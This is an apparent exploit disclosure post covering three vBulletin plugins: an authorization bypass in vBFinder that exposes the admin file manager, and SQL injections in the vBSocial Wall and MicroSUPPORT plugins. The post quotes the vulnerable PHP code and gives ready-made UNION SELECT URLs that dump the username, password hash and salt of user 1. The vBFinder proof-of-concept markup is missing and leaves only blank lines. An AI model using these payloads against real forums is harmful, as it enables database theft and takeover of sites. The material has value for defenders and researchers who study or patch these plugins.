vBulletin SCANU’s vBFinder Plugin – Authorization Bypass

Plugin: http://www.vbulletin.org/forum/showthread.php?t=299490
Version: <= 0.2 (latest) The mistake in this plugin is that the author did not add any checks in the connecter file, he doesn't check if the user is currently logged in as an administrator. We can simply exploit this by making a .html file and by pointing all URL references to the admincp of a forum with this plugin. Proof of concept:


	
		
		
		
		

		
		
		

		
		

		
		

		
		
	
	
		
Loading…

This will establish a connection to the vulnerable host and will pop-up the file manager.
You can now download/upload/delete anything you want and browse through all of the files.

vBulletin vBSocial.com Wall Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294260
Version: <= 2.5 (latest) The vulnerability resides in the misc_start hook and the /includes/class_statusbit.php file:

	public function process_fetch_status_item($status_id)
	{
		global $vbulletin;
		$status_item = $vbulletin->db->query_first(“SELECT * FROM “.TABLE_PREFIX.”status WHERE id=’$status_id'”);
		if ($status_item)
		{
			$status_item[‘message’] = htmlspecialchars_uni($status_item[‘message’]);
			$status_item[‘message’] = smartConvertPost($status_item[‘message’]); // parse image links
			$status_item[‘message’] = parse_youtubelinks($status_item[‘message’]);     // parse youtube video links
            $status_item[‘message’] = nl2br(trim(fetch_censored_text($status_item[‘message’])));

		     if ($status_item[‘type’] == ‘poll’){
		     	 $poll_get = $vbulletin->db->query_read(“SELECT * FROM “.TABLE_PREFIX.”status_poll WHERE statusid='”.$status_item[‘id’].”‘”);
		     	 if ($vbulletin->db->num_rows($poll_get) > 0){
		     	 	 $i = 0;
		     	 	while ($poll_item = $vbulletin->db->fetch_array($poll_get)){
		     	 		$i ++;
		     	 		$status_item[‘message’] .= ‘
‘; } } } return $status_item[‘message’]; } }

User input data is being passed to functions without being sanitized or checked.

Proof of concept:
http://example.com/misc.php?do=ln_fetch_status_item&status_id=11' UNION SELECT null, concat(username, 0x3a, password, 0x3a, salt), null, null, null, null, null, null, null, null, null, null, null FROM user WHERE userid = '1

This will display the username, password and salt of the user with id 1 in the database.

Images
vBSocial Wall SQL Injection

vBulletin MicroSUPPORT Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=254336
Version: <= 4.6.4 (latest) The vulnerability resides in the microsupport.php file. Not a single variable is sanitized and directly used in the SQL queries, at all places. An easy way to extract information out of the database is by abusing the checkchatcall_request part in the php file, which looks like this:

if ($_REQUEST[‘requester’] == “checkchatcall_request”) {
	$adminsID = $vbulletin->input->clean_gpc(‘r’, ‘adminsID’, TYPE_STR);
	$chatcheck = $db->query_read(“SELECT * FROM “.TABLE_PREFIX.”microsupport_supportusers_online WHERE supportuserid=$adminsID”);
	
	while($row = $db->fetch_array($chatcheck)) {
		if($row[usersUID] > 0){
			$usersid = $row[usersUID];
    $output = ‘checkchatcall=1&supportuseridrequester=’.$usersid;
		}else{
    $output = ‘checkchatcall=0’;
		}
	}
	echo $output;
}

Proof of concept:
http://example.com/microsupport.php?requester=checkchatcall_request&adminsID=1 UNION SELECT null, concat(1, 0x3a, username, 0x3a, password, 0x3a, salt), null, null, null FROM user where userid = 1

Note that the first field in the concat function must be a number since the function checks if the usersUID is bigger than 0, which is the first column in the result.

Images
microSUPPORT SQL Injection